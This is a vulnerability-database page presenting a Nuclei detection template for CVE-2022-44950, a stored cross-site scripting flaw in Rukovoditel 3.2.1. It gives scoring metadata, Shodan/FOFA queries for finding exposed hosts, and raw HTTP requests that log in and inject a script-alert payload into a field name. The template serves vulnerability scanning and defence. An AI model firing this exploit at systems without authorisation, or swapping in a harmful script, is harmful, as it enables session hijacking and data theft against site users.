Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-44950
HistoryJul 07, 2023 - 9:38 a.m.

Rukovoditel <= 3.2.1 - Cross Site Scripting

2023-07-0709:38:49
ProjectDiscovery
github.com
11
cve
cve2022
rukovoditel
cross-site-scripting
authenticated
intrusive
data-theft
session-hijacking
web-scripts
html-vulnerability

CVSS3

5.4

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

EPSS

0.001

Percentile

30.2%

Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add New Field function at /index.php?module=entities/fields&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field.
id: CVE-2022-44950

info:
  name: Rukovoditel <= 3.2.1 - Cross Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add New Field function at /index.php?module=entities/fields&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application.
  remediation: |
    Upgrade Rukovoditel to a version higher than 3.2.1 to mitigate the XSS vulnerability.
  reference:
    - https://github.com/anhdq201/rukovoditel/issues/10
    - http://rukovoditel.com/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-44950
    - http://rukovoditel.com
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2022-44950
    cwe-id: CWE-79
    epss-score: 0.00091
    epss-percentile: 0.39059
    cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: rukovoditel
    product: rukovoditel
    shodan-query: http.favicon.hash:-1499940355
    fofa-query: icon_hash=-1499940355
  tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated,intrusive

http:
  - raw:
      - |
        GET /index.php?module=users/login HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /index.php?module=users/login&action=login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        form_session_token={{nonce}}&username={{username}}&password={{password}}
      - |
        POST /index.php?module=entities/fields&action=save&token={{nonce}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfKx13B5QBU5Sccgf

        ------WebKitFormBoundaryfKx13B5QBU5Sccgf
        Content-Disposition: form-data; name="form_session_token"

        {{nonce}}
        ------WebKitFormBoundaryfKx13B5QBU5Sccgf
        Content-Disposition: form-data; name="entities_id"

        24
        ------WebKitFormBoundaryfKx13B5QBU5Sccgf
        Content-Disposition: form-data; name="forms_tabs_id"

        29
        ------WebKitFormBoundaryfKx13B5QBU5Sccgf
        Content-Disposition: form-data; name="name"

        <script>alert(document.domain)</script>
        ------WebKitFormBoundaryfKx13B5QBU5Sccgf
        Content-Disposition: form-data; name="short_name"

        test
        ------WebKitFormBoundaryfKx13B5QBU5Sccgf
        Content-Disposition: form-data; name="type"

        fieldtype_input
        ------WebKitFormBoundaryfKx13B5QBU5Sccgf
        Content-Disposition: form-data; name="fields_configuration[width]"

        input-small
        ------WebKitFormBoundaryfKx13B5QBU5Sccgf
        Content-Disposition: form-data; name="fields_configuration[default_value]"


        ------WebKitFormBoundaryfKx13B5QBU5Sccgf
        Content-Disposition: form-data; name="fields_configuration[is_unique]"

        0
        ------WebKitFormBoundaryfKx13B5QBU5Sccgf
        Content-Disposition: form-data; name="fields_configuration[unique_error_msg]"


        ------WebKitFormBoundaryfKx13B5QBU5Sccgf
        Content-Disposition: form-data; name="required_message"


        ------WebKitFormBoundaryfKx13B5QBU5Sccgf
        Content-Disposition: form-data; name="tooltip"


        ------WebKitFormBoundaryfKx13B5QBU5Sccgf
        Content-Disposition: form-data; name="tooltip_item_page"


        ------WebKitFormBoundaryfKx13B5QBU5Sccgf
        Content-Disposition: form-data; name="access_template"


        ------WebKitFormBoundaryfKx13B5QBU5Sccgf
        Content-Disposition: form-data; name="access[5]"

        yes
        ------WebKitFormBoundaryfKx13B5QBU5Sccgf
        Content-Disposition: form-data; name="access[4]"

        yes
        ------WebKitFormBoundaryfKx13B5QBU5Sccgf
        Content-Disposition: form-data; name="notes"


        ------WebKitFormBoundaryfKx13B5QBU5Sccgf--

    redirects: true
    max-redirects: 3
    matchers:
      - type: dsl
        dsl:
          - status_code_3 == 200
          - contains(content_type_3, "text/html")
          - contains(body_3, "<script>alert(document.domain)</script>")
          - contains(body_3, "rukovoditel")
        condition: and

    extractors:
      - type: regex
        name: nonce
        group: 1
        regex:
          - id="form_session_token" value="(.*)" type="hidden"
        internal: true
# digest: 4b0a00483046022100c99a72cd695b897b931cad1d38d07ca45c70e164c7136a4cac2592d075d90f54022100afc6513a339b7815c8a694fcdb6ca71474b84f37cc7627864a271f3d6038a3ff:922c64590222798bb761d5b6d8e72950

CVSS3

5.4

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

EPSS

0.001

Percentile

30.2%

Related for NUCLEI:CVE-2022-44950